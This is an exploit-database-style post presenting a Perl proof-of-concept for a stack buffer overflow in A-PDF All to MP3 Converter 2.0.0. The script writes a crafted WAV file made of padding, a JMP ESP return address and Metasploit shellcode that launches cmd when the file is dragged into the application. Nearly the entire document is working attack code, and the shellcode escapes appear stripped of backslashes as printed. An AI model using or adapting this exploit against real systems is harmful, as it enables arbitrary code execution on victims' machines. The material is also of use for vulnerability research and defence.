A-PDF All To MP3 Converter 2.0.0 Buffer Overflow
Posted on 18 January 2011
# Exploit Title: A-PDF All to MP3 Converter v.2.0.0 stack based buffer overflow # Software Link: http://www.a-pdf.com/all-to-mp3/download.htm # Version: <= 2.0.0 # Tested on: Win XP SP3 French # Date: 17/01/2011 # Author: h1ch4m #Email: h1ch4m@live.fr #Home: http://Net-Effects.blogspot.com # triggering details: Open the app, drag the wav file, booom cmd pops out my $file= "1.wav"; my $junk = "x41" x 4128; my $EIP = pack('V', 0x7c86467b); # JMP ESP (ff e4) kernel32.dll # windows/exec - 220 bytes # http://www.metasploit.com # Encoder: x86/call4_dword_xor # EXITFUNC=seh, CMD=cmd my $shellcode = "x29xc9x83xe9xcfxe8xffxffxffxffxc0x5ex81x76" . "x0exd1xd1xc1x66x83xeexfcxe2xf4x2dx39x48x66" . "xd1xd1xa1xefx34xe0x13x02x5ax83xf1xedx83xdd" . "x4ax34xc5x5axb3x4exdex66x8bx40xe0x2exf0xa6" . "x7dxedxa0x1axd3xfdxe1xa7x1exdcxc0xa1x33x21" . "x93x31x5ax83xd1xedx93xedxc0xb6x5ax91xb9xe3" . "x11xa5x8bx67x01x81x4ax2exc9x5ax99x46xd0x02" . "x22x5ax98x5axf5xedxd0x07xf0x99xe0x11x6dxa7" . "x1exdcxc0xa1xe9x31xb4x92xd2xacx39x5dxacxf5" . "xb4x84x89x5ax99x42xd0x02xa7xedxddx9ax4ax3e" . "xcdxd0x12xedxd5x5axc0xb6x58x95xe5x42x8ax8a" . "xa0x3fx8bx80x3ex86x89x8ex9bxedxc3x3ax47x3b" . "xbbxd0x4cxe3x68xd1xc1x66x81xb9xf0xedxbex56" . "x3exb3x6ax2fxcfx54x3bxb9x67xf3x6cx4cx3exb3" . "xedxd7xbdx6cx51x2ax21x13xd4x6ax86x75xa3xbe" . "xabx66x82x2ex14x05xbcxb5xc1x66"; open($FILE,">$file"); print $FILE $junk.$EIP.$shellcode; close($FILE);
